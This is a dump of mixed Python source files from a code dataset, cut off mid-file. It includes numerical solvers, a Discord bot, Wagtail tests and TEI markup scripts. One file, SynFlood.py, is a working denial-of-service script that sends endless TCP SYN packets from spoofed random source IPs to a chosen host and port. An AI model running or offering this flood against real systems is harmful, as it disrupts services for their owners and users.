+{"seq_id":"170135224","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nEste script es para resolver la ecuación de Newell-Whitehead-Segel\n'''\n\nfrom __future__ import division\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\nnp.random.seed(555)\n\ndef inicializa_N(N, N_steps, h):\n '''\n Rellena N con las condiciones iniciales del problema.\n Se asegura que las condiciones en los bordes sean uno y cero.\n '''\n N = np.random.uniform(low=-0.3, high=0.3, size=N_steps)\n\n N[0] = 1\n N[-1] = 0\n return N\n\ndef calcula_b(b, N_steps, r, mu=1.5):\n for j in range(1, N_steps - 1):\n b[j] = r * N[j+1] + (1-2*r) * N[j] + r * N[j-1] + dt*mu*(N[j]-(N[j])**3)\n\n\ndef calcula_alpha_y_beta(alhpa, beta, b, r, N_Steps):\n Aplus = -1 * r\n Acero = (1 + 2 * r)\n Aminus = -1 * r\n alpha[0] = 0\n beta[0] = 1 # viene de la condicion de borde T(t, 0) = 1 ¿?\n for i in range(1, N_steps):\n alpha[i] = -Aplus / (Acero + Aminus*alpha[i-1])\n beta[i] = (b[i] - Aminus*beta[i-1]) / (Aminus*alpha[i-1] + Acero)\n\n\ndef avanza_paso_temporal(N, N_next, alpha, beta, N_steps, mu=1.5):\n N_next[0] = 1\n N_next[-1] = 0\n for i in range(N_steps - 2, 0, -1):\n N_next[i] =alpha[i] * N_next[i+1] + beta[i] # Crank-N\n\n# Main\n# setup\nN_steps = 501\nN_pasos_temporales = 1000\ngamma=0.001\n#mu=1.5\n\nh = 1 / (N_steps - 1)\ndt = 0.01\nr = (dt / 2 / h**2) * gamma\n\nN = np.zeros(N_steps)\nN_next = np.zeros(N_steps)\n\nb = np.zeros(N_steps)\nalpha = np.zeros(N_steps)\nbeta = np.zeros(N_steps)\n\nN = inicializa_N(N, N_steps, h)\n\n# Queremos guardar las soluciones en cada paso\nN_solucion = np.zeros((N_pasos_temporales, N_steps))\nN_solucion[0, :] = N.copy()\n\nfor i in range(1, N_pasos_temporales):\n calcula_b(b, N_steps, r)\n calcula_alpha_y_beta(alpha, beta, b, r, N_steps)\n avanza_paso_temporal(N, N_next, alpha, beta, N_steps)\n N = N_next.copy()\n N_solucion[i, :] = N.copy()\n\n\n# Plots\n\n# PLOT 1\n\nx = np.linspace(0, 1, N_steps)\n\nfig = plt.figure(1)\nfig.clf()\nax = fig.add_subplot(111)\n\nfor i in range(0, N_pasos_temporales, 10):\n ax.plot(x, N_solucion[i, :],'r')\n#ax.set_ylim(0, 1)\n\nplt.xlabel('Posicion')\nplt.ylabel(r'$n(x,t)$')\nplt.title(r\"$n$ en funcion de la posicion entre t = 0 y t = 10\")\nplt.savefig(\"2imagen_1\")\n#Plot 2\n\nfig2 = plt.figure(2)\nfig2.clf()\nax2 = fig2.add_subplot(111)\nfrom matplotlib.collections import LineCollection\nline_segments = LineCollection([list(zip(x, ys)) for ys in N_solucion],\n linewidths=(0.5, 1, 1.5, 2),\n linestyles='solid')\nline_segments.set_array(x)\nax2.add_collection(line_segments)\nfig2 = plt.gcf()\nplt.sci(line_segments)\n\nplt.xlabel('Posicion')\nplt.ylabel(r'$n(x,t)$')\nplt.title(r\"$n$ en funcion de la posicion entre t = 0 y t = 10\")\nplt.ylim(-1,1)\nplt.savefig(\"2imagen_2\")\n\n# PLOT 3\n# usar el plano x, t y plotear N en la 3a dimension\n\nfig3 = plt.figure(3)\nfig3.clf()\nax3 = fig3.add_subplot(111)\ny = np.arange(0, N_pasos_temporales) * dt\nX, Y = np.meshgrid(x, y)\nax3.pcolormesh(X, Y, N_solucion)\n\n\nplt.xlabel('Posicion')\nplt.ylabel('Tiempo')\nplt.title(r\"Plano Posicion-Tiempo con $n(x,t)$ en la tercera dimension\")\nplt.savefig(\"2imagen_3\")\nplt.show()\nplt.draw()\n","sub_path":"Solution_to_Newell-Whitehead-Segel.py","file_name":"Solution_to_Newell-Whitehead-Segel.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"441931243","text":"import numpy\nfrom numpy import array, cross, dot, sqrt\nfrom datetime import datetime, timezone\nfrom numpy.linalg import norm\n\n# read STK file (rough probably)\ndef read_STK(filename):\n '''Read and parse an STK ECEF satellite position file (assumes data directory)\n ----------------------------------------------------------------------------\n Inputs:\n --------\n `filename` -- string with the file name\n \n Returns:\n --------\n `data` -- dictionary containing the STK file info\n '''\n\n data_dir = '/Users/rockm/Documents/CU_Boulder/ASEN_4018/Software/'\n \n # create dictionary\n data = {\n 'Time': [],\n 'r_vec': [],\n 'r_mag': [],\n }\n \n # month dictionary\n month = {\n 'Jan': 1,\n 'Feb': 2,\n 'Mar': 3,\n 'Apr': 4,\n 'May': 5,\n 'Jun': 6,\n 'Jul': 7,\n 'Aug': 8,\n 'Sep': 9,\n 'Oct': 10,\n 'Nov': 11,\n 'Dec': 12\n }\n \n # parse data\n with open(data_dir + filename, 'r') as file:\n lines = list(file.readlines())\n for i, line in enumerate(lines):\n if (i >= 7):\n Line = line.split()\n\n # Time stuff\n year = int(Line[2])\n day = int(Line[0])\n hour = int(Line[3][0:2])\n minute = int(Line[3][3:5])\n # can add seconds here once we start caring about them\n\n # Space stuff\n x = float(Line[4]) \n y = float(Line[5])\n z = float(Line[6])\n r_vec = array([x, y, z])\n r_mag = float(Line[7]) # magnitude of position vector\n\n # append Time and Space to the data dictionary's lists\n data['Time'].append(datetime(year, month[Line[1]], day, hour, minute, tzinfo=timezone.utc))\n data['r_vec'].append(r_vec)\n data['r_mag'].append(r_mag)\n data['r_vec'] = array(data['r_vec'])\n \n return data\n\n# Gibb's Method \ndef Gibby(r_vec, r_mag, mu):\n '''Use Gibb's Method to produce a velocity vector from three consecutive\n position vectors.\n ----------------------------------------------------------------------------\n Inputs:\n --------\n `r_vec` -- numpy array of three consecutive (in time) position vectors (3,3) [km]\n `r_mag` -- list of corresponding vector magnitudes [km]\n `mu` -- Standard Gravitational Parameter of the central body [km**3 / s**2]\n \n Returns:\n --------\n `v_vec` -- velocity vector (numpy array) at the second position vector's \n time (1,3) [km/s]\n `coplanar_val` -- dot product of unit vectors that should be coplanar for Gibb's\n Method to work properly [~] (closer to zero is better)\n '''\n \n # compute unit vectors\n C_01 = cross(r_vec[0], r_vec[1]) / norm(cross(r_vec[0], r_vec[1]))\n C_12 = cross(r_vec[1], r_vec[2]) / norm(cross(r_vec[1], r_vec[2]))\n C_20 = cross(r_vec[2], r_vec[0]) / norm(cross(r_vec[2], r_vec[0]))\n \n # check how coplanar the position vectors are\n coplanar_val = dot((r_vec[0] / r_mag[0]), C_12)\n \n # calculate N, D, and S\n N = r_mag[0] * cross(r_vec[1], r_vec[2]) + r_mag[1] * cross(r_vec[2], r_vec[0]) + r_mag[2] * cross(r_vec[0], r_vec[1])\n D = cross(r_vec[0], r_vec[1]) + cross(r_vec[1], r_vec[2]) + cross(r_vec[2], r_vec[0])\n S = r_vec[0] * (r_mag[1] - r_mag[2]) + r_vec[1] * (r_mag[2] - r_mag[0]) + r_vec[2] * (r_mag[0] - r_mag[1])\n \n # calculate velocity vector at second position vector\n v_vec = sqrt(mu / (norm(N) * norm(D))) * ((cross(D, r_vec[1]) / r_mag[1]) + S)\n \n return v_vec, coplanar_val","sub_path":"gibbs.py","file_name":"gibbs.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"74221949","text":"from utils import load_data_with_pickle, save_data_with_pickle\n\nPICKLES_PATH = '../../source_files/pickles/'\n\ncorpus = load_data_with_pickle(PICKLES_PATH + 'corpus')\n\n\ndef find(word_to_index):\n word_indexes = {}\n line_index = 0\n for sentence in c.corpus[:500]:\n for word_i, word in enumerate(sentence):\n if word in word_to_index:\n try:\n word_indexes[word].append([line_index, word_i])\n except:\n word_indexes[word] = [[line_index, word_i]]\n\n line_index += 1 \n return word_indexes\n\n\n","sub_path":"preprocessing/parallel_script.py","file_name":"parallel_script.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203948564","text":"import os\r\nimport discord\r\nimport json\r\nimport random\r\nimport time\r\nimport asyncpg\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\ndef get_prefix(client, message):\r\n with open('prefixes.json', 'r')as f:\r\n prefixes = json.load(f)\r\n\r\n return prefixes[str(message.guild.id)]\r\n\r\nclient = commands.Bot(command_prefix = '.', case_insensitive = True)\r\nclient.remove_command('help')\r\n\r\n@client.event\r\nasync def on_ready():\r\n await client.change_presence(activity=discord.Activity(type=discord.ActivityType.Game, name='with commands | .help'))\r\n print('Bot is online!')\r\n@client.event\r\nasync def on_command_error(ctx, error):\r\n if isinstance(error, commands.CommandNotFound):\r\n await ctx.send('Command wasn\\'t found, make sure the command exists and check if it is spelled correctly.') \r\n \r\n\r\n \r\n\r\n \r\n@client.event\r\nasync def on_guild_join(guild):\r\n with open('prefixes.json', 'r') as f:\r\n prefixes = json.load(f)\r\n\r\n prefixes [str(guild.id)] = '.'\r\n\r\n with open('prefixes.json', 'w') as f:\r\n json.dump(prefixes, f, indent = 4)\r\n \r\n\r\n@client.event\r\nasync def on_guild_remove(guild):\r\n with open('prefixes.json', 'r') as f:\r\n prefixes = json.load(f)\r\n\r\n prefixes.pop(str(guild.id))\r\n\r\n with open('prefixes.json', 'w') as f:\r\n json.dump(prefixes, f, indent = 4)\r\n\r\nfor filename in os.listdir('./cogs'):\r\n if filename.endswith('.py'):\r\n client.load_extension(f'cogs.{filename[:-3]}')\r\n \r\n\r\n \r\n\r\n\r\nclient.run(os.environ['TOKEN'])\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568993803","text":"from django.urls import path, include\nfrom pdds.views import index, getClientes, getTransportistas, getProductos, estadoPedido, ubicacionPedido, setPedido, setTipoCliente\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'pedidos'\n\nurlpatterns = [\n path('', login_required(index), name = 'index'),\n path('getClientes', getClientes),\n path('getTransportistas', getTransportistas),\n path('getProductos', getProductos),\n path('estadoPedido/', estadoPedido),\n path('ubicacionPedido/', ubicacionPedido),\n path('setPedido', setPedido),\n path('setTipoCliente',login_required(setTipoCliente), name='setTipoCliente' ),\n\n]\n","sub_path":"Semana13Hackaton/rpineda/whtsppPedidos/pdds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231958969","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.cache import cache\nfrom django.test import TestCase\n\nfrom wagtail.tests.testapp.models import EventIndex, SimplePage\nfrom wagtail.wagtailcore.models import Page, PageViewRestriction, Site\n\nfrom .sitemap_generator import Sitemap\n\n\nclass TestSitemapGenerator(TestCase):\n def setUp(self):\n self.home_page = Page.objects.get(id=2)\n\n self.child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Hello world!\",\n slug='hello-world',\n content=\"hello\",\n live=True,\n ))\n\n self.unpublished_child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Unpublished\",\n slug='unpublished',\n content=\"hello\",\n live=False,\n ))\n\n self.protected_child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Protected\",\n slug='protected',\n content=\"hello\",\n live=True,\n ))\n PageViewRestriction.objects.create(page=self.protected_child_page, password='hello')\n\n self.site = Site.objects.get(is_default_site=True)\n\n def test_get_pages(self):\n sitemap = Sitemap(self.site)\n pages = sitemap.get_pages()\n\n self.assertIn(self.child_page.page_ptr, pages)\n self.assertNotIn(self.unpublished_child_page.page_ptr, pages)\n self.assertNotIn(self.protected_child_page.page_ptr, pages)\n\n def test_get_urls(self):\n sitemap = Sitemap(self.site)\n urls = [url['location'] for url in sitemap.get_urls()]\n\n self.assertIn('http://localhost/', urls) # Homepage\n self.assertIn('http://localhost/hello-world/', urls) # Child page\n\n def test_get_urls_uses_specific(self):\n # Add an event page which has an extra url in the sitemap\n self.home_page.add_child(instance=EventIndex(\n title=\"Events\",\n slug='events',\n live=True,\n ))\n\n sitemap = Sitemap(self.site)\n urls = [url['location'] for url in sitemap.get_urls()]\n\n self.assertIn('http://localhost/events/', urls) # Main view\n self.assertIn('http://localhost/events/past/', urls) # Sub view\n\n def test_render(self):\n sitemap = Sitemap(self.site)\n xml = sitemap.render()\n\n # Check that a URL has made it into the xml\n self.assertIn('http://localhost/hello-world/', xml)\n\n # Make sure the unpublished page didn't make it into the xml\n self.assertNotIn('http://localhost/unpublished/', xml)\n\n # Make sure the protected page didn't make it into the xml\n self.assertNotIn('http://localhost/protected/', xml)\n\n\nclass TestSitemapView(TestCase):\n def test_sitemap_view(self):\n response = self.client.get('/sitemap.xml')\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'wagtailsitemaps/sitemap.xml')\n self.assertEqual(response['Content-Type'], 'text/xml; charset=utf-8')\n\n def test_sitemap_view_cache(self):\n cache_key = 'wagtail-sitemap:%d' % Site.objects.get(is_default_site=True).id\n\n # Check that the key is not in the cache\n self.assertNotIn(cache_key, cache)\n\n # Hit the view\n first_response = self.client.get('/sitemap.xml')\n\n self.assertEqual(first_response.status_code, 200)\n self.assertTemplateUsed(first_response, 'wagtailsitemaps/sitemap.xml')\n\n # Check that the key is in the cache\n self.assertIn(cache_key, cache)\n\n # Hit the view again. Should come from the cache this time\n second_response = self.client.get('/sitemap.xml')\n\n self.assertEqual(second_response.status_code, 200)\n self.assertTemplateNotUsed(second_response, 'wagtailsitemaps/sitemap.xml') # Sitemap should not be re rendered\n\n # Check that the content is the same\n self.assertEqual(first_response.content, second_response.content)\n","sub_path":"wagtail/contrib/wagtailsitemaps/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"42788177","text":"from ipywidgets import interact, interactive, fixed, interact_manual\nfrom ipywidgets import widgets,Layout\n\nclass TextAreaWithButton:\n def __init__(self, Func=None,Name=\"textArea\",FunctionName=\"Button\", BufferSize=10000,height='500px'): \n l = Layout(flex='0 1 auto', height=height, min_height='40px', width='auto')\n self.BufferSize=BufferSize\n self.tba = widgets.Textarea(\n value='',\n placeholder='Type something',\n description=Name,\n disabled=False,\n layout=l\n )\n self.button = widgets.Button(description=FunctionName)\n self.Func = Func\n \n self.button.on_click(self.pressButton)\n\n \n def __call__(self, textUpdate):\n dummy = self.tba.value + textUpdate\n self.tba.value = dummy[-self.BufferSize:]\n \n def setFunction(self,Func):\n self.Func = Func\n \n def Display(self):\n display(self.button)\n display(self.tba)\n \n def pressButton(self,x):\n self.tba.value = \"\"\n self.Func()\n \n ","sub_path":"Jupyter_helpers/TextAreaWithButton.py","file_name":"TextAreaWithButton.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"53696679","text":"from abc import abstractmethod\nfrom typing import Generator\nfrom nboost.helpers import count_lines\nfrom nboost.logger import set_logger\nfrom nboost import PKG_PATH\nfrom pathlib import Path\nfrom tqdm import tqdm\nimport csv\n\n\nclass BaseIndexer:\n \"\"\"An object that sends a csv to a given search api.\"\"\"\n\n def __init__(self, file: str, name: str = 'nboost', id_col: int = 0,\n field_col: int = 1, field_name: str = 'passage',\n host: str = '0.0.0.0', port: int = 9200, delim: str = '\\t',\n shards: int = 3, verbose: bool = False, **_):\n \"\"\"\n :param name: name of the index\n :param id_col: column number of the id\n :param field_col: column number of the field data\n :param field_name: name of the field\n :param host: host of the search api server\n :param port: port the the server\n :param shards: number of shards for the index\n \"\"\"\n self.file = file\n self.name = name\n self.id_col = id_col\n self.field_col = field_col\n self.field_name = field_name\n self.host = host\n self.port = port\n self.delim = delim\n self.shards = shards\n self.logger = set_logger(self.__class__.__name__, verbose=verbose)\n\n def csv_generator(self) -> Generator:\n \"\"\"yield the `--id_col` and `--field_col` from the `--file` csv\"\"\"\n pkg_path = PKG_PATH.joinpath('resources').joinpath(self.file)\n cwd_path = Path().joinpath(self.file).absolute()\n\n if pkg_path.exists():\n path = pkg_path\n elif cwd_path.exists():\n path = cwd_path\n else:\n self.logger.error('Could not find %s or %s', pkg_path, cwd_path)\n raise SystemExit\n\n self.logger.info('Estimating completion size...')\n num_lines = count_lines(path)\n with path.open() as file:\n with tqdm(total=num_lines, desc=path.name) as pbar:\n for line in csv.reader(file, delimiter=self.delim):\n pbar.update()\n yield line[self.id_col], line[self.field_col]\n\n @abstractmethod\n def index(self):\n \"\"\"send the csv to the index\"\"\"\n","sub_path":"nboost/indexer/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503633356","text":"from lxml import etree\nimport re\nimport os\nfrom prereform2modern import Processor\n\ndef markup_choices_for_editorial_corrections(text):\n choice_pattern = re.compile(\n r'([*, ]*)?(\\s*(\\w*?(\\[(.*?)\\])\\w*)\\s*)(?!\\\">)()?'\n # r'(]*?>[*, ]*)?(\\s*(\\w*?(\\[(.*?)])\\w*)\\s*)(?!\\\">)()?'\n )\n illegible_pattern = re.compile( # решить, что с этим делать\n r'(\\[\\d+.*?не\\s*разобр.*?\\])|' # [2 неразобр.]\n # вл[иянием?]\n r'(\\[\\?\\])' # [?]\n )\n crossed_out_pattern = re.compile(\n # r'(<.*?>)?(з|З)ач(е|ё)ркнуто:(<.*?>)?'\n r'(<[^>]*?>)?(з|З)ач(е|ё)ркнуто:(<[^>]*?>)?'\n )\n choice_result = re.findall(choice_pattern, text)\n\n for i in choice_result:\n if (\n i[0] or # if inside head\n illegible_pattern.search(i[2]) is not None or\n crossed_out_pattern.search(i[2]) is not None\n ):\n continue\n elif re.search(r'(\\w*\\[\\w+\\?\\s*\\])', i[2]):\n sub_1 = re.sub(r'\\[|\\]', r'', i[2])\n sub_2 = re.sub(r'\\[|\\(', r'\\\\[', i[2])\n sub_3 = re.sub(r'\\]|\\)', r'\\\\]', sub_2)\n sub_3 = re.sub(\"\\?\", \"\\?\", sub_2)\n sub_4 = re.sub('\\[.*?\\]', '', i[2])\n sub_4 = re.sub(\"\\?\", \"\", sub_4)\n choice_attribute = re.search('<.*?>(.*?)<.*?>', i[2]) # [хвастовство]\n if choice_attribute is None:\n choice_attribute = i[2]\n else:\n choice_attribute = choice_attribute.group(1)\n replacement = (f''\n f'{sub_4}{sub_1}')\n reg_for_repl = f'(?)'\n text = re.sub(reg_for_repl, replacement, text)\n continue\n sub_1 = re.sub(r'\\[|\\]', r'', i[2])\n sub_2 = re.sub(r'\\[|\\(', r'\\\\[', i[2])\n sub_3 = re.sub(r'\\]|\\)', r'\\\\]', sub_2)\n sub_4 = re.sub('\\[.*?\\]', '', i[2])\n choice_attribute = re.search('<.*?>(.*?)<.*?>', i[2]) # [хвастовство]\n if choice_attribute is None:\n choice_attribute = i[2]\n else:\n choice_attribute = choice_attribute.group(1)\n replacement = (f''\n f'{sub_4}{sub_1}')\n reg_for_repl = f'(?)'\n text = re.sub(reg_for_repl, replacement, text)\n return text\n\n\n\ndef markup_choices_for_prereform_spelling(text):\n split_pattern = re.compile(r'(.*?)')\n # rus_pattern = re.compile(r'[а-яА-Я\\n ]')\n tokens = split_pattern.split(text)\n # print(tokens)\n # print(len(tokens))\n for i, token in enumerate(tokens):\n if split_pattern.search(token) is not None:\n \n corr_pattern = r'(.*?)'\n matchobj = re.search(corr_pattern, token)\n if not matchobj: \n matchobj = re.search(r'(.*?)', token)\n to_corr = matchobj.group(2)\n text_res, changes, s_json = Processor.process_text(\n text=to_corr,\n show=True,\n delimiters=['', '', ''],\n check_brackets=False\n )\n tokens[i] = f'{text_res}'\n else:\n in_head_pattern = r'].*?>\\[.*?\\]' # Иначе странно себя ведет\n if re.search(in_head_pattern, token) is not None:\n continue # Иначе [II.] -> \n text_res, changes, s_json = Processor.process_text(\n text=token,\n show=True,\n delimiters=['', '', ''],\n check_brackets=False\n )\n tokens[i] = text_res\n # print('token', token, '\\nresult', text_res)\n # print(tokens)\n return ''.join(tokens)\n\n \ndef q_mark_correction(text:str):\n '''функция для разметки редакторских сокращений со знаком вопроса такого вида:\n ко[торого?]'''\n pattern = re.compile(r'([*, ]*)?(\\s*(\\w+?(\\[[^<\\[]+?\\?\\])\\w*)\\s*)(?!\\\">)()?')\n choice_result = re.findall(pattern, text)\n for result in choice_result:\n sub_1 = re.escape(result[2])\n sub_2 = re.sub('\\[.*?\\]', '', result[2])\n sub_3 = re.sub(r'\\[|\\]|\\?', r'', result[2])\n\n replacement = (f''\n f'{sub_2}{sub_3}')\n reg_for_repl = f'(?)'\n #print(reg_for_repl)\n #print(replacement)\n \n text = re.sub(reg_for_repl, replacement, text)\n\n return text \n \ndef editor_changes(text:str):\n #убрать все пропуски между тегами\n text = re.sub(\"\\s{2,}|\\n\", \"\", text) \n # паттерн для примечаний, где слово Зачеркнуто выделено тегом hi\n # Здесь есть вопрос: ([^>]+?) - мне нужно, чтобы в середине выражения матчилась и слова и теги ,\n # но не никакой другой открывающийся тег\n pattern_hi = re.compile(\"(]*?>]*?>]*?>[^<]+?]*?>)]*?>(Зач\\.[:;]|Зач[её]ркнуто[:;])(.*?(?=

))(

.*?)\")\n\n text = pattern_hi.sub(\"\\g<1>\\g<3>\\g<4>\", text)\n\n \n # [?] перед квадратными скобками\n text = re.sub(\"\\s([^\\s^<>]+?)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n # [?] перед словом в тегах редакторской коррекции\n text = re.sub(\"(([^<]+?|)[^<]+?
)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n # [?] перед словом в тегах дореволюционной орфографии\n text = re.sub(\"([^<>]+?[^<>]+?)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n # для [1 неразбор.]\n text = re.sub(\"\\[([0-9])\\s*не\\s*разобр\\.\\]\", \"\", text)\n text = q_mark_correction(text)\n return text\ndef change_editor_notes(file:str):\n tree = etree.parse(file)\n root = tree.getroot()\n text = etree.tostring(root, pretty_print=True, encoding=\"unicode\")\n text = editor_changes(text)\n root = etree.fromstring(text)\n for note in root.findall(\".//{http://www.tei-c.org/ns/1.0}note\"):\n # для примечаний в самом теге note\n\n if note.text is not None:\n if re.search(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(.+)\", note.text):\n note.text = markup_choices_for_editorial_corrections(note.text)\n note.text = markup_choices_for_prereform_spelling(note.text)\n\n note.text = re.sub(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(.+)\", \"\\g<2>\", note.text)\n \n else:\n # для примечаний в тегах p\n for p in note.findall(\".//{http://www.tei-c.org/ns/1.0}p\"):\n \n if p.text is not None:\n if re.search(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(\\w+)\", p.text):\n p.text = markup_choices_for_editorial_corrections(p.text)\n p.text = markup_choices_for_prereform_spelling(p.text)\n p.text = re.sub(\"([Зз]ач\\.[:;]|Зач[ёе]ркнуто[:;])\\s*(.+)\", \"\\g<2>\", p.text)\n p.text = re.sub(\"<(.+?)>\", \"\\g<1>\", p.text)\n \n Element_tree = etree.ElementTree(root)\n Element_tree.write(file, encoding = \"utf-8\", xml_declaration=True, pretty_print=True)\ndef pipline():\n path = \"/content/TEI/files_with_updated_headers\"\n folders = os.listdir(path)\n for folder in folders:\n new_path = f\"{path}/{folder}\"\n files = os.listdir(new_path)\n os.chdir(new_path)\n for file in files:\n change_editor_notes(file)\nif __name__ == \"__main__\":\n pipline() \n","sub_path":"utils/editor_corr.py","file_name":"editor_corr.py","file_ext":"py","file_size_in_byte":8731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336372049","text":"__author__ = 'adamhoward'\n# Find the initial number under one million which produces the longest Collatz sequence\n\n\ndef hailstone(num):\n count = 1\n while num > 1:\n if num % 2 == 0:\n num = num / 2\n else:\n num = (num * 3) + 1\n count += 1\n return count\n\nlargestSeq = 0\nlargestStart = 0\nstart = 1\nwhile start < 1000000:\n temp = hailstone(start)\n # print(temp)\n if temp > largestSeq:\n largestSeq = temp\n largestStart = start\n start += 1\n\nprint(largestStart)\n","sub_path":"Problem 14.py","file_name":"Problem 14.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"314928726","text":"f=open('pinglog.txt','r')\r\nmyfile=f.read()\r\nf.close()\r\nmystr=myfile.split('\\n')\r\ns=False\r\ne=False\r\nfor x in range(0,len(mystr)):\r\n if ('False' in mystr[x]) and (s==False):\r\n s=mystr[x][0:20]\r\n if ('False' not in mystr[x]) and (s!=False):\r\n e=mystr[x-1][0:20]\r\n print(s[0:10],' ', s[11:-1],'-', e[11:-1], ' ', mystr[x-1][20:])\r\n s=False\r\n","sub_path":"My Pythons/mycompressor.py","file_name":"mycompressor.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570196809","text":"# coding: utf-8\n# Copyright 2013 The Font Bakery Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.\nimport fnmatch\nimport os\n\nfrom fontcrunch import fontcrunch\n\nfrom bakery_cli.system import shutil\n\n\nclass FontCrunch(object):\n\n def __init__(self, bakery):\n self.project_root = bakery.project_root\n self.builddir = bakery.build_dir\n self.bakery = bakery\n\n def run(self, filename, pipedata):\n if not pipedata.get('fontcrunch'):\n return # run fontcrunch only if user set flag in config\n filename = os.path.join(self.builddir, filename)\n self.bakery.logging_raw('### Fontcrunch {}\\n'.format(filename))\n\n fontcrunch.optimize(filename, '{}.crunched'.format(filename))\n shutil.move('{}.crunched'.format(filename), filename)\n return 1\n\n def execute(self, pipedata):\n if not pipedata.get('fontcrunch'):\n return # run fontcrunch only if user set flag in config\n task = self.bakery.logging_task('Fontcrunch TTF')\n if self.bakery.forcerun:\n return\n\n try:\n for filename in [os.path.join(self.builddir, x) \\\n for x in pipedata['bin_files']]:\n self.run(filename, pipedata)\n self.bakery.logging_task_done(task)\n except:\n self.bakery.logging_task_done(task, failed=True)\n raise\n","sub_path":"bakery_cli/pipe/font_crunch.py","file_name":"font_crunch.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"494753596","text":"from __future__ import print_function\nimport sys, socket, random, threading\nfrom scapy.all import *\n\n\nclass SynFlood (threading.Thread):\n def __init__(self, host, port):\n threading.Thread.__init__(self)\n\n self.host = host\n self.port = port\n\n def run(self):\n ip = IP()\n ip.src = \"%d.%d.%d.%d\" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))\n ip.dst = self.host\n\n tcp = TCP()\n tcp.sport = random.randint(1, 65535)\n tcp.dport = self.port\n tcp.flags = \"S\"\n\n send(ip/tcp, verbose=0)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print (\"[!] Usage: python\", __file__, \" \")\n sys.exit(0)\n\n try:\n host = sys.argv[1]\n socket.inet_aton(host)\n except socket.error:\n print (\"[!] IP missing!\")\n sys.exit(0)\n\n try:\n port = int(sys.argv[2])\n except ValueError:\n print (\"[!] Port missing!\")\n sys.exit(0)\n\n total = 0\n conf.iface = \"en0\"\n try:\n while True:\n SynFlood(host, port).run()\n total += 1\n print (\"Packets sent:\\t\\t%d\" % total, end='\\r')\n except KeyboardInterrupt:\n print (\"\\n[!] Exiting...\")\n sys.exit(0)","sub_path":"DoS/SynFlood.py","file_name":"SynFlood.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"593509056","text":"from openpyxl import load_workbook\nimport datetime\n\ninput_file=\"inputs/in_data.xlsx\"\noutput_file=\"outputs/out_data.xlsx\"\n\nwb = load_workbook(filename=input_file)\nws = wb.active\n\nws.delete_cols(5, 3)\nwb.save(filename=output_file)\n","sub_path":"python/openpyxl/read-n-write.py","file_name":"read-n-write.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624183799","text":"from django.contrib.auth.mixins import LoginRequiredMixin,\\\n PermissionRequiredMixin\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.sites.models import Site\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.template.loader import render_to_string\nfrom django.views.generic import DetailView, ListView, CreateView, UpdateView,\\\n DeleteView\n\nfrom django_filters.views import FilterView\n\nfrom .models import Ad, Reply, News\nfrom .filters import AdFilter\nfrom .tasks import send_mail\n\n\n# Create your views here.\n\nclass AdList(ListView):\n model = Ad\n template_name = \"ad_list.html\"\n context_object_name 